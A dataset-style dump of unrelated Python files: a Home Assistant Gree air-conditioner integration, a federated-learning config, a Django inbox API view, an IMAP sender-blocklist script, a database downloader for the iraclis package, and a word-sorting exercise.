3c091171ce7d459ab7bdf55ac4292ac21cd0a68c
| 12,007
|
py
|
Python
|
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | 1
|
2018-12-10T17:32:48.000Z
|
2018-12-10T17:32:48.000Z
|
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | null | null | null |
custom_components/climate/gree.py
|
ardeus-ua/gree-python-api
|
ecfbdef34ff99fc0822f70be17cdeb6c625fd276
|
[
"MIT"
] | 1
|
2020-08-11T14:51:04.000Z
|
2020-08-11T14:51:04.000Z
|
import asyncio
import logging
import binascii
import socket
import os.path
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.climate import (DOMAIN, ClimateDevice, PLATFORM_SCHEMA, STATE_IDLE, STATE_HEAT, STATE_COOL, STATE_AUTO, STATE_DRY,
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE, SUPPORT_FAN_MODE, SUPPORT_SWING_MODE)
from homeassistant.const import (ATTR_UNIT_OF_MEASUREMENT, ATTR_TEMPERATURE, CONF_NAME, CONF_HOST, CONF_MAC, CONF_TIMEOUT, CONF_CUSTOMIZE)
from homeassistant.helpers.event import (async_track_state_change)
from homeassistant.core import callback
from homeassistant.helpers.restore_state import RestoreEntity
from configparser import ConfigParser
from base64 import b64encode, b64decode
REQUIREMENTS = ['gree==0.3.2']
_LOGGER = logging.getLogger(__name__)
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE | SUPPORT_FAN_MODE | SUPPORT_SWING_MODE
CONF_UNIQUE_KEY = 'unique_key'
CONF_MIN_TEMP = 'min_temp'
CONF_MAX_TEMP = 'max_temp'
CONF_TARGET_TEMP = 'target_temp'
CONF_TEMP_SENSOR = 'temp_sensor'
CONF_OPERATIONS = 'operations'
CONF_FAN_MODES = 'fan_modes'
CONF_SWING_LIST = 'swing_list'
CONF_DEFAULT_OPERATION = 'default_operation'
CONF_DEFAULT_FAN_MODE = 'default_fan_mode'
CONF_DEFAULT_SWING_MODE = 'default_swing_mode'
CONF_DEFAULT_OPERATION_FROM_IDLE = 'default_operation_from_idle'
STATE_FAN = 'fan'
STATE_OFF = 'off'
DEFAULT_NAME = 'GREE AC Climate'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
DEFAULT_MIN_TEMP = 16
DEFAULT_MAX_TEMP = 30
DEFAULT_TARGET_TEMP = 20
DEFAULT_OPERATION_LIST = [STATE_OFF, STATE_AUTO, STATE_COOL, STATE_DRY, STATE_FAN, STATE_HEAT]
OPERATION_LIST_MAP = {
STATE_AUTO: 0,
STATE_COOL: 1,
STATE_DRY: 2,
STATE_FAN: 3,
STATE_HEAT: 4,
}
DEFAULT_FAN_MODE_LIST = ['auto', 'low', 'medium-low', 'medium', 'medium-high', 'high']
FAN_MODE_MAP = {
'auto': 0,
'low': 1,
'medium-low': 2,
'medium': 3,
'medium-high': 4,
'high': 5
}
DEFAULT_SWING_LIST = ['default', 'swing-full-range', 'fixed-up', 'fixed-middle', 'fixed-down', 'swing-up', 'swing-middle', 'swing-down']
SWING_MAP = {
'default': 0,
'swing-full-range': 1,
'fixed-up': 2,
'fixed-middle': 4,
'fixed-down': 6,
'swing-up': 11,
'swing-middle': 9,
'swing-down': 7
}
DEFAULT_OPERATION = 'idle'
DEFAULT_FAN_MODE = 'auto'
DEFAULT_SWING_MODE = 'default'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Required(CONF_UNIQUE_KEY): cv.string,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
vol.Optional(CONF_MIN_TEMP, default=DEFAULT_MIN_TEMP): cv.positive_int,
vol.Optional(CONF_MAX_TEMP, default=DEFAULT_MAX_TEMP): cv.positive_int,
vol.Optional(CONF_TARGET_TEMP, default=DEFAULT_TARGET_TEMP): cv.positive_int,
vol.Optional(CONF_TEMP_SENSOR): cv.entity_id,
vol.Optional(CONF_DEFAULT_OPERATION, default=DEFAULT_OPERATION): cv.string,
vol.Optional(CONF_DEFAULT_FAN_MODE, default=DEFAULT_FAN_MODE): cv.string,
vol.Optional(CONF_DEFAULT_SWING_MODE, default=DEFAULT_SWING_MODE): cv.string,
vol.Optional(CONF_DEFAULT_OPERATION_FROM_IDLE): cv.string
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the GREE platform."""
name = config.get(CONF_NAME)
ip_addr = config.get(CONF_HOST)
mac_addr = config.get(CONF_MAC)
unique_key = config.get(CONF_UNIQUE_KEY).encode()
min_temp = config.get(CONF_MIN_TEMP)
max_temp = config.get(CONF_MAX_TEMP)
target_temp = config.get(CONF_TARGET_TEMP)
temp_sensor_entity_id = config.get(CONF_TEMP_SENSOR)
operation_list = DEFAULT_OPERATION_LIST
swing_list = DEFAULT_SWING_LIST
fan_list = DEFAULT_FAN_MODE_LIST
default_operation = config.get(CONF_DEFAULT_OPERATION)
default_fan_mode = config.get(CONF_DEFAULT_FAN_MODE)
default_swing_mode = config.get(CONF_DEFAULT_SWING_MODE)
default_operation_from_idle = config.get(CONF_DEFAULT_OPERATION_FROM_IDLE)
import gree
gree_device = gree.GreeDevice(mac_addr, unique_key, ip_addr)
try:
gree_device.update_status()
except socket.timeout:
_LOGGER.error("Failed to connect to Gree Device")
async_add_devices([
GreeClimate(hass, name, gree_device, min_temp, max_temp, target_temp, temp_sensor_entity_id, operation_list, fan_list, swing_list, default_operation, default_fan_mode, default_swing_mode, default_operation_from_idle)
])
ATTR_VALUE = 'value'
DEFAULT_VALUE = True
def gree_set_health(call):
value = call.data.get(ATTR_VALUE, DEFAULT_VALUE)
gree_device.send_command(health_mode=bool(value))
hass.services.async_register(DOMAIN, 'gree_set_health', gree_set_health)
class GreeClimate(ClimateDevice, RestoreEntity):
def __init__(self, hass, name, gree_device, min_temp, max_temp, target_temp, temp_sensor_entity_id, operation_list, fan_list, swing_list, default_operation, default_fan_mode, default_swing_mode, default_operation_from_idle):
"""Initialize the Gree Climate device."""
self.hass = hass
self._name = name
self._min_temp = min_temp
self._max_temp = max_temp
self._target_temperature = target_temp
self._target_temperature_step = 1
self._unit_of_measurement = hass.config.units.temperature_unit
self._current_temperature = 0
self._temp_sensor_entity_id = temp_sensor_entity_id
self._current_operation = default_operation
self._current_fan_mode = default_fan_mode
self._current_swing_mode = default_swing_mode
self._operation_list = operation_list
self._fan_list = fan_list
self._swing_list = swing_list
self._default_operation_from_idle = default_operation_from_idle
self._gree_device = gree_device
if temp_sensor_entity_id:
async_track_state_change(
hass, temp_sensor_entity_id, self._async_temp_sensor_changed)
sensor_state = hass.states.get(temp_sensor_entity_id)
if sensor_state:
self._async_update_current_temp(sensor_state)
def send_command(self):
power = True
mode = None
operation = self._current_operation.lower()
if operation == 'off':
power = False
else:
mode = OPERATION_LIST_MAP[operation]
fan_speed = FAN_MODE_MAP[self._current_fan_mode.lower()]
temperature = self._target_temperature
swing = SWING_MAP[self._current_swing_mode.lower()]
        for retry in range(DEFAULT_RETRY):
            try:
                self._gree_device.send_command(power_on=power, temperature=temperature, fan_speed=fan_speed, mode=mode, swing=swing)
            except (socket.timeout, ValueError):
                try:
                    self._gree_device.update_status()
                except socket.timeout:
                    if retry == DEFAULT_RETRY-1:
                        _LOGGER.error("Failed to send command to Gree Device")
            else:
                # success: stop retrying so the command is not sent DEFAULT_RETRY times
                break
@asyncio.coroutine
def _async_temp_sensor_changed(self, entity_id, old_state, new_state):
"""Handle temperature changes."""
if new_state is None:
return
self._async_update_current_temp(new_state)
yield from self.async_update_ha_state()
@callback
def _async_update_current_temp(self, state):
"""Update thermostat with latest state from sensor."""
unit = state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
try:
_state = state.state
if self.represents_float(_state):
self._current_temperature = self.hass.config.units.temperature(
float(_state), unit)
except ValueError as ex:
_LOGGER.error('Unable to update from sensor: %s', ex)
def represents_float(self, s):
try:
float(s)
return True
except ValueError:
return False
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def name(self):
"""Return the name of the climate device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def min_temp(self):
"""Return the polling state."""
return self._min_temp
@property
def max_temp(self):
"""Return the polling state."""
return self._max_temp
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._target_temperature_step
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self._current_operation
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._operation_list
@property
def swing_list(self):
"""Return the list of available swing modes."""
return self._swing_list
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self._current_fan_mode
@property
def current_swing_mode(self):
"""Return current swing mode."""
return self._current_swing_mode
@property
def fan_list(self):
"""Return the list of available fan modes."""
return self._fan_list
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
def set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_TEMPERATURE) is not None:
self._target_temperature = kwargs.get(ATTR_TEMPERATURE)
if not (self._current_operation.lower() == 'off' or self._current_operation.lower() == 'idle'):
self.send_command()
elif self._default_operation_from_idle is not None:
self.set_operation_mode(self._default_operation_from_idle)
self.schedule_update_ha_state()
def set_fan_mode(self, fan):
"""Set new target temperature."""
self._current_fan_mode = fan
if not (self._current_operation.lower() == 'off' or self._current_operation.lower() == 'idle'):
self.send_command()
self.schedule_update_ha_state()
def set_operation_mode(self, operation_mode):
"""Set new target temperature."""
self._current_operation = operation_mode
self.send_command()
self.schedule_update_ha_state()
def set_swing_mode(self, swing_mode):
"""Set new target swing operation."""
self._current_swing_mode = swing_mode
self.send_command()
self.schedule_update_ha_state()
    @asyncio.coroutine
    def async_added_to_hass(self):
        # RestoreEntity is a mixin class, not an awaitable helper; with
        # GreeClimate inheriting it above, the saved state is restored like this.
        state = yield from self.async_get_last_state()
if state is not None:
self._target_temperature = state.attributes['temperature']
self._current_operation = state.attributes['operation_mode']
self._current_fan_mode = state.attributes['fan_mode']
self._current_swing_mode = state.attributes['swing_mode']
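# Example configuration sketch (not from the original source): with the file
# installed as custom_components/climate/gree.py, a configuration.yaml entry
# matching PLATFORM_SCHEMA above could look like this; host, mac and
# unique_key values are placeholders.
#
# climate:
#   - platform: gree
#     name: Living Room AC
#     host: 192.168.1.50
#     mac: 'aa:bb:cc:dd:ee:ff'
#     unique_key: 'a1b2c3d4e5f6a7b8'
#     min_temp: 16
#     max_temp: 30
#     target_temp: 24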
| 34.404011
| 228
| 0.68077
| 1,500
| 12,007
| 5.082
| 0.132
| 0.022039
| 0.02217
| 0.034632
| 0.279942
| 0.206874
| 0.155844
| 0.101666
| 0.07884
| 0.072544
| 0
| 0.004437
| 0.230366
| 12,007
| 348
| 229
| 34.502874
| 0.820474
| 0.065795
| 0
| 0.143969
| 0
| 0
| 0.056301
| 0.002432
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105058
| false
| 0
| 0.058366
| 0
| 0.237354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c0d77712915106228bf8f6e63542f7a42d1d3f1
| 1,602
|
py
|
Python
|
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | 1
|
2022-03-18T15:27:29.000Z
|
2022-03-18T15:27:29.000Z
|
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | null | null | null |
config.py
|
jasonyanglu/fedavgpy
|
cefbe5854f02d3df1197d849872286439c86e949
|
[
"MIT"
] | null | null | null |
# GLOBAL PARAMETERS
DATASETS = ['sent140', 'nist', 'shakespeare',
'mnist', 'synthetic', 'cifar10']
TRAINERS = {'fedavg': 'FedAvgTrainer',
'fedavg4': 'FedAvg4Trainer',
'fedavg5': 'FedAvg5Trainer',
'fedavg9': 'FedAvg9Trainer',
'fedavg_imba': 'FedAvgTrainerImba',}
OPTIMIZERS = TRAINERS.keys()
class ModelConfig(object):
def __init__(self):
pass
def __call__(self, dataset, model):
dataset = dataset.split('_')[0]
if dataset == 'mnist' or dataset == 'nist':
if model == 'logistic' or model == '2nn':
return {'input_shape': 784, 'num_class': 10}
else:
return {'input_shape': (1, 28, 28), 'num_class': 10}
elif dataset == 'cifar10':
return {'input_shape': (3, 32, 32), 'num_class': 10}
elif dataset == 'sent140':
sent140 = {'bag_dnn': {'num_class': 2},
'stacked_lstm': {'seq_len': 25, 'num_class': 2, 'num_hidden': 100},
'stacked_lstm_no_embeddings': {'seq_len': 25, 'num_class': 2, 'num_hidden': 100}
}
return sent140[model]
elif dataset == 'shakespeare':
shakespeare = {'stacked_lstm': {'seq_len': 80, 'emb_dim': 80, 'num_hidden': 256}
}
return shakespeare[model]
elif dataset == 'synthetic':
return {'input_shape': 60, 'num_class': 10}
else:
            raise ValueError('Unsupported dataset {}!'.format(dataset))
MODEL_PARAMS = ModelConfig()
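# Usage sketch (illustrative, not part of the original file): MODEL_PARAMS is
# callable, and __call__ strips any suffix after the first underscore before
# the lookup, so e.g.:
#
#   MODEL_PARAMS('mnist_all', 'logistic')        # {'input_shape': 784, 'num_class': 10}
#   MODEL_PARAMS('shakespeare', 'stacked_lstm')  # {'seq_len': 80, 'emb_dim': 80, 'num_hidden': 256}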
| 38.142857
| 103
| 0.529963
| 156
| 1,602
| 5.217949
| 0.467949
| 0.068796
| 0.078624
| 0.034398
| 0.12285
| 0.071253
| 0.071253
| 0.071253
| 0.071253
| 0
| 0
| 0.061412
| 0.318976
| 1,602
| 41
| 104
| 39.073171
| 0.684693
| 0.010612
| 0
| 0.057143
| 0
| 0
| 0.286166
| 0.016425
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057143
| false
| 0.028571
| 0
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c10cbd008220b779ffa61252edc4ab7bdc901a1
| 5,506
|
py
|
Python
|
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | 1
|
2021-04-06T22:35:53.000Z
|
2021-04-06T22:35:53.000Z
|
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | null | null | null |
server/inbox/views.py
|
amy-xiang/CMPUT404_PROJECT
|
cbcea0cd164d6377ede397e934f960505e8f347a
|
[
"W3C-20150513"
] | null | null | null |
from django.core.exceptions import ValidationError
from django.shortcuts import render, get_object_or_404
from django.db import IntegrityError
from rest_framework import authentication, generics, permissions, status
from rest_framework.exceptions import PermissionDenied
from rest_framework.response import Response
from posts.serializers import PostSerializer
from author.serializers import AuthorProfileSerializer
from main.models import Author
from nodes.models import Node
from main import utils
from posts.models import Post
from likes.models import Like
from .models import Inbox
from .serializers import InboxSerializer
from urllib.parse import urlparse
import requests
import json
# api/author/{AUTHOR_ID}/inbox/
class InboxView(generics.RetrieveUpdateDestroyAPIView):
serializer_class = InboxSerializer
authenticate_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def get_inbox(self):
request_author_id = self.kwargs['author_id']
if self.request.user.id != request_author_id:
raise PermissionDenied(
detail={'error': ['You do not have permission to this inbox.']})
if not self.request.user.adminApproval:
raise PermissionDenied(
detail={'error': ['User has not been approved by admin.']})
return get_object_or_404(Inbox, author=Author.objects
.get(id=self.request.user.id))
# GET: get Inbox of an user
def get(self, request, *args, **kwargs):
inbox = self.get_inbox()
serializer = InboxSerializer(inbox, context={'request': request})
return Response(serializer.data)
# POST: send a Post, Like or Follow to Inbox
def post(self, request, *args, **kwargs):
request_author_id = self.kwargs['author_id']
inbox_type = request.data.get('type')
if inbox_type is not None: inbox_type = inbox_type.lower()
host_name = request.get_host()
if inbox_type == 'post':
post_id = request.data.get('id')
try:
Inbox.objects.get(author=request_author_id).send_to_inbox(request.data)
except Inbox.DoesNotExist as e:
return Response({'error':'Author not found! Please check author_id in URL.'},
status=status.HTTP_404_NOT_FOUND)
return Response({'data':f'Shared Post {post_id} with Author '
f'{request_author_id} on {host_name}.'},
status=status.HTTP_200_OK)
elif inbox_type == 'like':
id_url = request.data.get('object')
parsed_uri = urlparse(id_url)
object_host = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
# Sending a LIKE from (us or remote server) to us
if (object_host == utils.HOST):
try:
Inbox.objects.get(author=request_author_id).send_to_inbox(request.data)
except Inbox.DoesNotExist as e:
return Response({'error':'Author not found! Please check author_id in URL.'},
status=status.HTTP_404_NOT_FOUND)
# Sending a LIKE from us to remote server
else:
try:
remote_server = Node.objects.get(remote_server_url=object_host)
except Node.DoesNotExist:
return Response({'error':'Could not find remote server user'}, status=status.HTTP_404_NOT_FOUND)
r = requests.post(
f"{object_host}api/author/{request_author_id}/inbox/",
json=request.data,
auth=(remote_server.konnection_username, remote_server.konnection_password))
if r.status_code < 200 or r.status_code >= 300:
return Response({'error':'Could not complete the request to the remote server'},
status=r.status_code)
# Gather information for the Like object creation
try:
object_type = Like.LIKE_COMMENT if ('comments' in id_url) else Like.LIKE_POST
if (id_url.endswith('/')):
object_id = id_url.split('/')[-2]
else:
object_id = id_url.split('/')[-1]
like_author_id = request.data.get('author')['id'].split('/')[-1]
Like.objects.create(
author=request.data.get('author'), author_id=like_author_id,
object=id_url, object_type=object_type, object_id=object_id
)
except IntegrityError:
return Response({'data':f'You have already sent a like to {object_type} {id_url} on {host_name}.'},
status=status.HTTP_200_OK)
return Response({'data':f'Sent like to {object_type} {id_url} on {host_name}.'},
status=status.HTTP_200_OK)
else:
return Response({'error':'Invalid type, only \'post\', \'like\''},
status=status.HTTP_400_BAD_REQUEST)
# DELETE: Clear the inbox
def delete(self, request, *args, **kwargs):
inbox = self.get_inbox()
length = len(inbox.items)
inbox.items.clear()
inbox.save()
return Response({'data':f'Deleted {length} messages.'}, status=status.HTTP_200_OK)
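# Illustrative request sketch (not part of the original file): sending a like
# to this endpoint POSTs JSON shaped roughly as below; the URLs and IDs are
# placeholders.
#
# POST /api/author/{AUTHOR_ID}/inbox/
# {
#     "type": "like",
#     "object": "https://example.com/api/author/123/posts/456",
#     "author": {"id": "https://example.com/api/author/789"}
# }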
| 44.403226
| 116
| 0.606793
| 643
| 5,506
| 5.021773
| 0.239502
| 0.039641
| 0.039641
| 0.023537
| 0.245587
| 0.200062
| 0.1917
| 0.17126
| 0.138123
| 0.138123
| 0
| 0.01007
| 0.296586
| 5,506
| 123
| 117
| 44.764228
| 0.823651
| 0.046858
| 0
| 0.244898
| 0
| 0
| 0.132824
| 0.014886
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0.010204
| 0.183673
| 0
| 0.377551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c119513513dbce82555731b084d2de00dc48dc8
| 1,873
|
py
|
Python
|
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | null | null | null |
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | 1
|
2019-12-11T08:49:51.000Z
|
2019-12-11T08:49:51.000Z
|
black_list_all.py
|
philipempl/mail_watch
|
802df3146c462aeb670a4a973e428976d90abf06
|
[
"Apache-2.0"
] | null | null | null |
import imaplib, base64, os, email, re, configparser
import tkinter as tk
from tkinter import messagebox
from datetime import datetime
from email import generator
from dateutil.parser import parse
# `config` and `black_list` are used below but never created in the original;
# the INI filename here is an assumption.
config = configparser.ConfigParser()
config.read('config.ini')
black_list = "blackList.txt"

def init():
    # ConfigParser values are strings, so the port is cast to int
    mail = imaplib.IMAP4_SSL(config['SERVER']['Host'], int(config['SERVER']['Port']))
pwd = str(input("PWD: "))
print(pwd)
mail.login(str(config['ADDRESS']['Email']),pwd )
for dir in config['MAIL_DIRS']:
dir = config['MAIL_DIRS'][dir]
print('\n ########################## ' + dir + ' ##################################\n')
mail.select(dir)
type, data = mail.search(None, 'ALL')
mail_ids = data[0]
id_list = mail_ids.split()
readAllMails(id_list, mail)
def printProgressBar(iteration, total, prefix='', suffix='', length=50):
    # minimal stand-in for the progress-bar helper the original calls but
    # never defines
    filled = int(length * iteration // total)
    bar = '#' * filled + '-' * (length - filled)
    print('\r%s |%s| %s/%s %s' % (prefix, bar, iteration, total, suffix), end='')
    if iteration == total:
        print()

def readAllMails(id_list, mail):
counter = 0
l = len(id_list)
for num in id_list:
typ, data = mail.fetch(num, '(RFC822)' )
raw_email = data[0][1]
# converts byte literal to string removing b''
try:
raw_email_string = raw_email.decode('utf-8')
email_message = email.message_from_string(raw_email_string)
# get sender from mail
except:
continue
sender_name = ''
sender_email = ''
sender_array = email_message['from'].split('<')
if(len(sender_array) > 1):
sender_email = (sender_array[1][:-1]).lower()
sender_name = re.sub(r"[^a-zA-Z0-9]+", ' ',sender_array[0]).strip()
else:
sender_email = (sender_array[0]).lower()
counter = counter + 1
printProgressBar(counter, l, prefix = 'Progress:', suffix = 'Complete', length = 50)
if(isInBlackList(sender_email) == False):
addToBlackList(sender_email)
def isInBlackList(sender):
with open(black_list) as blackList:
if sender in blackList.read():
return True
else:
return False
def addToBlackList(sender):
    hs = open(black_list, "a")
    hs.write(sender + "\n")
    hs.close()
init()
| 28.378788
| 99
| 0.620929
| 244
| 1,873
| 4.631148
| 0.438525
| 0.026549
| 0.026549
| 0.058407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014122
| 0.206086
| 1,873
| 66
| 100
| 28.378788
| 0.745797
| 0.034704
| 0
| 0.037736
| 0
| 0
| 0.109635
| 0.03433
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.113208
| 0
| 0.226415
| 0.056604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c129d467e7a619b95bbc8aa752a9a6e384e5ae6
| 4,075
|
py
|
Python
|
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
iraclis/_1databases.py
|
nespinoza/Iraclis
|
3b5dd8d6bc073f6d2c24ad14341020694255bf65
|
[
"CC-BY-4.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ._0errors import *
from ._0imports import *
class Database:
def __init__(self, database_name, vital=False, date_to_update='daily', force_update=False, ask_size=None):
package_name = 'iraclis'
info_file_name = '_0database.pickle'
directory_name = 'database'
last_update_file_name = 'database_last_update.txt'
info_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), info_file_name)
package_path = os.path.join(os.path.expanduser('~'), '.{0}'.format(package_name))
if not os.path.isdir(package_path):
os.mkdir(package_path)
directory_path = os.path.join(package_path, '{0}_{1}'.format(database_name, directory_name))
last_update_file_path = os.path.join(package_path, '{0}_{1}'.format(database_name, last_update_file_name))
if date_to_update == 'daily':
date_to_update = int(time.strftime('%y%m%d'))
else:
date_to_update = int(date_to_update)
if os.path.isdir(directory_path):
if force_update or len(glob.glob(os.path.join(directory_path, '*'))) == 0:
shutil.rmtree(directory_path)
os.mkdir(directory_path)
update = True
else:
if not os.path.isfile(last_update_file_path):
update = True
elif int(open(last_update_file_path).readlines()[0]) < date_to_update:
update = True
else:
update = False
else:
os.mkdir(directory_path)
update = True
if update and ask_size:
if input('Downloading {0} database (up to {1})... proceed with download now? (y/n): '.format(
database_name, ask_size)) == 'y':
update = True
else:
update = False
if update:
# noinspection PyBroadException
try:
print('\nDownloading {0} database...'.format(database_name))
dbx_files = pickle.load(open(info_file_path, 'rb'))
dbx_files = dbx_files['{0}_{1}'.format(database_name, directory_name)]
for i in glob.glob(os.path.join(directory_path, '*')):
if os.path.split(i)[1] not in dbx_files:
os.remove(i)
for i in dbx_files:
if not os.path.isfile(os.path.join(package_path, dbx_files[i]['local_path'])):
print(i)
urlretrieve(dbx_files[i]['link'], os.path.join(package_path, dbx_files[i]['local_path']))
if database_name == 'clablimb':
xx = pickle.load(open(glob.glob(os.path.join(directory_path, '*'))[0], 'rb'))
for i in xx:
w = open(os.path.join(directory_path, i), 'w')
w.write(xx[i])
w.close()
w = open(last_update_file_path, 'w')
w.write(time.strftime('%y%m%d'))
w.close()
except Exception as inst:
print('\nDownloading {0} database failed. A download will be attempted next time.'.format(
database_name))
print('Error:', sys.exc_info()[0])
print(inst.args)
if (not os.path.isdir(directory_path) or
len(glob.glob(os.path.join(directory_path, '*'))) == 0):
if vital:
raise IraclisLibraryError('{0} database not available.'.format(database_name))
else:
print('\n{0} features cannot be used.'.format(database_name))
self.path = False
else:
self.path = directory_path
class Databases:
def __init__(self):
self.wfc3 = Database('wfc3', vital=True, date_to_update='181212').path
databases = Databases()
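# Usage sketch (illustrative): Database.path is False when a non-vital
# database could not be fetched (vital ones raise IraclisLibraryError
# instead), so callers can guard optional features on it.
# if databases.wfc3:
#     print('wfc3 database directory:', databases.wfc3)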
| 38.084112
| 114
| 0.553374
| 484
| 4,075
| 4.402893
| 0.243802
| 0.056312
| 0.051619
| 0.04458
| 0.332708
| 0.211638
| 0.164711
| 0.128578
| 0.113562
| 0.113562
| 0
| 0.010985
| 0.329816
| 4,075
| 106
| 115
| 38.443396
| 0.769315
| 0.007117
| 0
| 0.219512
| 0
| 0.012195
| 0.09817
| 0.005935
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0.012195
| 0.060976
| 0
| 0.109756
| 0.085366
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c134e04d61928fa6fcc6871ade77a7efb97baf0
| 1,029
|
py
|
Python
|
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | 2
|
2019-03-09T20:31:06.000Z
|
2020-06-19T12:15:13.000Z
|
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | null | null | null |
Level2/Ex_5.py
|
zac11/Python_Excerices
|
775739e2639be1f82cc3690c854b9ea0ece05042
|
[
"Apache-2.0"
] | 1
|
2018-08-11T18:36:49.000Z
|
2018-08-11T18:36:49.000Z
|
"""
Write a program that accepts a sequence of whitespace separated words as input and prints the words after removing all
duplicate words and sorting them alphanumerically.
Suppose the following input is supplied to the program:
hello world and practice makes perfect and hello world again
Then, the output should be:
again and hello makes perfect practice world
"""
string_input = input()
words = string_input.split(" ")
print(" ".join(sorted(list(set(words)))))
"""
Let's break it down now
print(set(words))
This will print a set of the words, with all the unique values
print(list(set(words)))
Create a list out of the values of words
print(sorted(list(set(words))))
This will sort the list
print(" ".join(sorted(list(set(words)))))
This joins the sorted list items with a whitespace
For this input :
I like to yawn and I also like to make a music and a car
Now output will be :
I a also and car like make music to yawn
Notice that the uppercase I is sorted at first position
"""
| 19.415094
| 118
| 0.74344
| 177
| 1,029
| 4.310734
| 0.418079
| 0.052425
| 0.06291
| 0.070773
| 0.104849
| 0.070773
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183673
| 1,029
| 52
| 119
| 19.788462
| 0.908333
| 0.348882
| 0
| 0
| 0
| 0
| 0.016667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
